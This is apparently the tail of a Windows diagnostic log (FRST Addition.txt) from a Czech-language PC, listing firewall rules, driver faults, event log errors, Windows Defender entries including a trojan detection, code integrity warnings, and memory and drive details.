FirewallRules: [{376867FA-3140-4A61-9CBA-168DCE9B8216}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{B6D40083-1F4E-477A-9015-8DC7E9A6A3C1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7E62B397-4825-42F8-9A15-E6ED471E0842}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{17289A97-0812-45DA-B9F8-824BEEE7D45C}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC971134-8067-4B9F-9EB2-3A04D2DD62F1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CE24B0E2-FC9C-4416-BF6D-2E4943991655}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C521D663-E846-45B1-B592-DEB0438CD546}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{4D14BB88-E721-4A09-9B0C-45C52C06B6A0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{98AE550D-AE3C-4286-907C-A78F1169EAD6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D55FDDCB-BD31-40A3-9B65-005FC38D9A7B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{DF498C8A-17E0-4FE0-8B77-16FDB398E8E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{987D7429-B9D0-4E08-A619-DA0B50A3E051}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{05AFB857-23D0-40D7-9E9E-EBD50D6AF0BC}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7E6397DA-11FF-495D-BBDA-EDB0E1F8C2B7}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{70248E8A-4E3E-49D2-8A4B-184E4DC26B78}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7D8251D0-28ED-4EDE-9545-D62A8457EEBF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D8165305-DF6F-458E-B77A-D66DD8119582}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F49A626E-6773-48DD-B529-1D2CABA6DB40}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{2BB23635-3555-4760-8329-9C3E6BEC50D9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{5EF6B97B-6CC2-4D6D-A2FD-2170143E542C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CC44B33F-2809-487C-8B49-0064BD70855A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{73400E7A-F989-43CB-84D0-D1EA511B25F9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{380E9148-9BA9-482E-A41C-82E22059545A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1A893123-B4BA-456F-A0C7-41F838DC949F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{8DB1E1F0-16A6-4606-9005-2050E5C78DE7}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{94EB72EF-A6B6-40A4-B5C2-6012F19A2856}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{C58183BB-F885-413A-8CCD-F9C3CCA34618}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{4D6DA014-7F0C-4B62-961A-70A13657F889}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{04F8F7EA-9E8D-4B8A-AA7C-E1546EBC72BE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{D2FA1B8F-C328-4C2E-AA5B-FB60C501ECC0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{10D54F44-89D5-4BBE-9707-0159D50EF144}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{8B080234-427A-4E7E-BDED-E4853E19C777}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C6A43CF8-A945-4350-ADBF-68B3F3A1E9D5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{D96CE39B-1EC5-47C4-B76F-591963112C3F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2559EE57-6464-4F43-9CA4-3245EA7A496F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1B2A11D6-89E4-4D54-8C29-31E8F4DA6D77}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{674586D3-506E-4FDD-A8AE-D3FAF3B0DA7A}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CD11B4D0-772F-453F-A1F0-BC0E1CF510E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{13D2236C-FE05-4D62-9CFA-6200735089C2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{FD2FA0E1-2074-415C-9F02-10C196F2C6A2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{8847043E-064A-490F-804D-68759745A67C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{8061FEA0-EF8E-4BF6-B1BB-808DED40D163}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{93678E0E-C66D-43DA-868A-F9E2058773BD}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{59C93D05-4690-44B4-9389-0F118AD02F38}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
==================== Restore Points =========================
07-01-2019 21:54:57 Naplánovaný kontrolní bod
11-01-2019 13:06:14 Operace obnovení
==================== Faulty Device Manager Devices =============
Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
Name: Intel(R) Display Audio
Description: Intel(R) Display Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Intel(R) Corporation
Service: IntcDAud
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
==================== Event log errors: =========================
Application errors:
==================
Error: (01/11/2019 08:07:55 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.
Error: (01/11/2019 08:09:03 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.
Error: (01/11/2019 08:09:02 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.
Error: (01/11/2019 08:09:01 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.
Error: (01/11/2019 08:09:00 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.
Error: (01/11/2019 08:08:59 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.
Error: (01/11/2019 08:08:58 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.
Error: (01/11/2019 08:08:57 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.
System errors:
=============
Error: (01/12/2019 12:05:07 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby EventSystem s argumenty Není k dispozici za účelem spuštění serveru:
{1BE1F766-5536-11D1-B726-00C04FB926AF}
Error: (01/12/2019 12:04:21 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (01/12/2019 12:03:24 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (01/12/2019 12:03:09 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B68-F52A-11D8-B9A5-505054503030}
Error: (01/12/2019 12:02:11 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (01/12/2019 12:01:05 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}
Error: (01/12/2019 12:00:59 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby TokenBroker s argumenty Není k dispozici za účelem spuštění serveru:
Windows.Internal.Security.Authentication.Web.TokenBrokerInternal
Error: (01/12/2019 12:00:59 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby netprofm s argumenty Není k dispozici za účelem spuštění serveru:
{A47979D2-C419-11D9-A5B4-001185AD2B89}
Windows Defender:
===================================
Date: 2019-01-11 13:05:02.337
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {C7624ED8-55B8-4C11-A697-F488F786E077}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Úplné prohledávání
Uživatel: DESKTOP-VBSMI5O\Martin
Date: 2019-01-10 19:36:54.115
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {3AEA90E1-AC2C-415F-92A2-FF1B00481283}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2019-01-10 19:23:18.123
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B5282268-AE53-47D3-948C-ECE9541D4170}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2019-01-10 19:01:02.490
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B8CB204C-EF17-40F0-8A73-72ED9379FE3F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2019-01-10 17:30:21.507
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:JS/Redirector!rfn
ID: 2147692383
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\ulol\AppData\Roaming\product.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-VBSMI5O\Martin
Název procesu: C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp
Verze podpisu: AV: 1.283.2606.0, AS: 1.283.2606.0, NIS: 1.283.2606.0
Verze modulu: AM: 1.1.15500.2, NIS: 1.1.15500.2
Date: 2019-01-11 23:59:21.017
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.
Date: 2019-01-11 20:05:50.438
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.
Date: 2019-01-11 13:46:01.063
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.
CodeIntegrity:
===================================
Date: 2019-01-11 19:33:13.957
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-11 19:23:44.957
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-11 19:02:52.546
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-11 18:50:49.237
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-11 18:35:34.802
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-11 18:28:40.259
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-11 17:56:09.418
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-01-11 15:33:10.017
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
Percentage of memory in use: 16%
Total physical RAM: 6035.48 MB
Available physical RAM: 5059.46 MB
Total Virtual: 6995.48 MB
Available Virtual: 6223.95 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:902.98 GB) (Free:593.08 GB) NTFS
\\?\Volume{7531e688-2fc9-4f9c-adf4-293c168a2c7e}\ (Windows RE tools) (Fixed) (Total:0.49 GB) (Free:0.17 GB) NTFS
\\?\Volume{ab46e8c9-01c0-4456-83ee-e16ccf8e90a8}\ () (Fixed) (Total:0.84 GB) (Free:0.33 GB) NTFS
\\?\Volume{d5549186-e4a3-4c4f-91cf-dc8b1b6f6540}\ () (Fixed) (Total:0.44 GB) (Free:0.42 GB) NTFS
\\?\Volume{2b981f92-3351-4f9f-b83d-9d44c784b14a}\ () (Fixed) (Total:0.34 GB) (Free:0.31 GB) NTFS
\\?\Volume{44e90043-829f-4bc5-b6bf-38a1d1519b56}\ (SAMSUNG_REC2) (Fixed) (Total:25 GB) (Free:0.91 GB) NTFS
\\?\Volume{318b7a2b-74b1-41bd-4173-636c65706975}\ (SAMSUNG_REC) (Fixed) (Total:1 GB) (Free:0.28 GB) FAT32
\\?\Volume{fe517963-fc07-4878-9792-efa4b3e98e24}\ (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.24 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 4EC8E0BC)
Partition: GPT.
==================== End of Addition.txt ============================